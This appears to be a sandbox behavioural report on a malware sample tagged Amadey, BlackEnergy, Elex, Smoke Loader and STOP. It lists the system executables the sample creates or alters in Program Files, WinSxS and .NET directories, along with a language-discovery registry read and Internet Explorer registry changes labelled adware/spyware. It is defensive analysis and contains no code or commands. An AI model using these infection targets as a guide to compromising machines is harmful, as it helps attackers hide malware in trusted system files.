File created C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.Brokered.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\amd64_microsoft-windows-coresystem-wpr_31bf3856ad364e35_10.0.19041.207_none_4054ef70f69f6ff9\wpr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-systemrestore-main_31bf3856ad364e35_10.0.19041.84_none_3e82ed1fe15c67db\r\rstrui.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-webcamexperience_31bf3856ad364e35_10.0.19041.746_none_4ae21b160a9d5bb2\CameraSettingsUIHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.19041.1288_none_1cec63974464878f\r\SenseIR.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-upnpdevicehost_31bf3856ad364e35_10.0.19041.153_none_aa284d65c7bee591\f\upnpcont.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-devicecensus_31bf3856ad364e35_10.0.19041.1_none_65637d0d99e451f6\DeviceCensus.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.1_none_21244f0b33e2b22d\PerceptionSimulationInput.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.19041.610_none_d94fa044111e8308\StartMenuExperienceHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.19041.153_none_1721bd4ad34c0544\r\MusNotifyIcon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-b..re-memorydiagnostic_31bf3856ad364e35_10.0.19041.1_none_987b063fd85ba334\memtest.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Panther\setup.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-coredpussvr_31bf3856ad364e35_10.0.19041.746_none_7946fb11bf19dc87\r\coredpussvr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.19041.1266_none_802f96a5044b0fbe\wmpconfig.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_netfx4-vbc_exe_b03f5f7f11d50a3a_4.0.15805.0_none_96edd00e05696409\vbc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-coredpussvr_31bf3856ad364e35_10.0.19041.746_none_7946fb11bf19dc87\coredpussvr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..biometrics-trustlet_31bf3856ad364e35_10.0.19041.1_none_fb337fa99fb8bc2f\BioIso.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..up-deviceencryption_31bf3856ad364e35_10.0.19041.1202_none_4f22e21b58d6c2e3\f\BitLockerDeviceEncryption.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-tapisetup_31bf3856ad364e35_10.0.19041.1_none_1fe438473a878c5c\TapiUnattend.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.19041.264_none_39eaf2470cfe88f0\f\explorer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ice-remoteposworker_31bf3856ad364e35_10.0.19041.1_none_d570c31a162768ba\RemotePosWorker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-recdisc-main_31bf3856ad364e35_10.0.19041.84_none_7c1f17a9e1beaf63\recdisc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-securitycenter-core_31bf3856ad364e35_10.0.19041.1081_none_8f1e438c6737a711\f\wscadminui.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-unattendedjoin_31bf3856ad364e35_10.0.19041.572_none_90e9bab3cbbfd71a\djoin.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-thumbexthost_31bf3856ad364e35_10.0.19041.746_none_d8baedf8d09aba05\r\ThumbnailExtractionHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_addinprocess32_b77a5c561934e089_4.0.15805.0_none_faee98a3c711fae7\AddInProcess32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.1288_none_a518f9eb1ab503d0\r\hvix64.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-runonce_31bf3856ad364e35_10.0.19041.1_none_cbabe2205e65787b\runonce.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-sctasks_31bf3856ad364e35_10.0.19041.906_none_686405dc140529cf\r\schtasks.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-upnpdevicehost_31bf3856ad364e35_10.0.19041.153_none_9fd3a313935e2396\upnpcont.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wmpdmc-ux_31bf3856ad364e35_10.0.19041.746_none_cc5cbb9556301da3\WMPDMC.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-hvsi-manager_31bf3856ad364e35_10.0.19041.1202_none_7cdad2e52790705d\hvsimgr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-vssservice_31bf3856ad364e35_10.0.19041.746_none_38c6194376a6b88c\f\VSSVC.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.19041.1202_none_3fe90cdb6667211e\wevtutil.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-csvde_31bf3856ad364e35_10.0.19041.1_none_112f38db81e24102\csvde.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-sensordataservice_31bf3856ad364e35_10.0.19041.1_none_b3f4f49ac9993d28\SensorDataService.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1_none_bf506ecc66a800df\poqexec.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-d..ervicing-management_31bf3856ad364e35_10.0.19041.746_none_46f79836a0dc7206\Dism.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-winre-recoverytools_31bf3856ad364e35_10.0.19041.1_none_95938c4a44e792de\ReAgentc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_220320d2c4216035\TiWorker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.19041.1_none_53219a572fef10a2\ctfmon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-performancetoolsgui_31bf3856ad364e35_10.0.19041.1_none_51facbaf4051768b\resmon.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-rasclienttools_31bf3856ad364e35_10.0.19041.1266_none_e40ca34e5de298c9\f\rasdial.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.19041.1237_none_a9b815907b71fe1a\wowreg32.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.264_none_13222f28beaa00a7\r\vmwp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.19041.1_none_f15a0c837b51c5fc\gpresult.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-i..raries-servercommon_31bf3856ad364e35_10.0.19041.906_none_9204c42a031e28cf\iissetup.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.19041.1266_none_4621ad58d5f654dd\f\Robocopy.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_addinprocess32_b77a5c561934e089_10.0.19041.1_none_3700bdc08c446a5c\AddInProcess32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_jsc_b03f5f7f11d50a3a_4.0.15805.0_none_02d98290c2a0aa6b\jsc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-aarsvc_31bf3856ad364e35_10.0.19041.1266_none_d7b5820f5a89765b\f\agentactivationruntimestarter.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ed-chinese-moimeexe_31bf3856ad364e35_10.0.19041.746_none_c3054a007d804943\r\ChsIME.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-ncsiuwpapp.appxmain_31bf3856ad364e35_10.0.19041.1052_none_648fbf276da33ed4\r\NcsiUwpApp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-sethc_31bf3856ad364e35_10.0.19041.1_none_18b14c7d1478d4cc\sethc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.19041.1_none_36e57bfcb85e0850\SpatialAudioLicenseSrv.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000004cdc76ad7de14ec05730e7115b22df1d0b7ace2eb4e8e6fa7a4983117d93bf30000000000e800000000200002000000075e84718a90ce77c1cc94b7b9ee9b13832b2f7b04fe168c1578363b127bb7b4810000000548ef6b0f4a1c9e732c38f49a3526572400000005f449fdef0a4cd49a1a52630c26911741e9b30e0259ca8b672b5b6ce5b777d10ac949c950dc61ce38d3aaeabbfa6ce98842a3938dd2d181a7db1c1451ed07303 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = … C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\User Preferences C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000067a75f0bade7600e5a3bd5ac762d5aebc22bd53977530954f7a906e21e2f41b000000000e800000000200002000000068ce645ef73eb645e40191c10b6df822aad2e72222e10dc23a57f75b65285fe61000000062ff78c3f5b3a24b4914b3b179a39a8640000000e5c44eeda090d3619f2ab56e4bb471caba0e9ee1a376cf269cebf0b6c453866ab9a62a51940d66ffb70f4a13baa170134d6c560e41893793f0f623c52dce8a33 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E4A2AADF-58CF-11F0-9B6E-5ED5395D997F} = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31190236" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
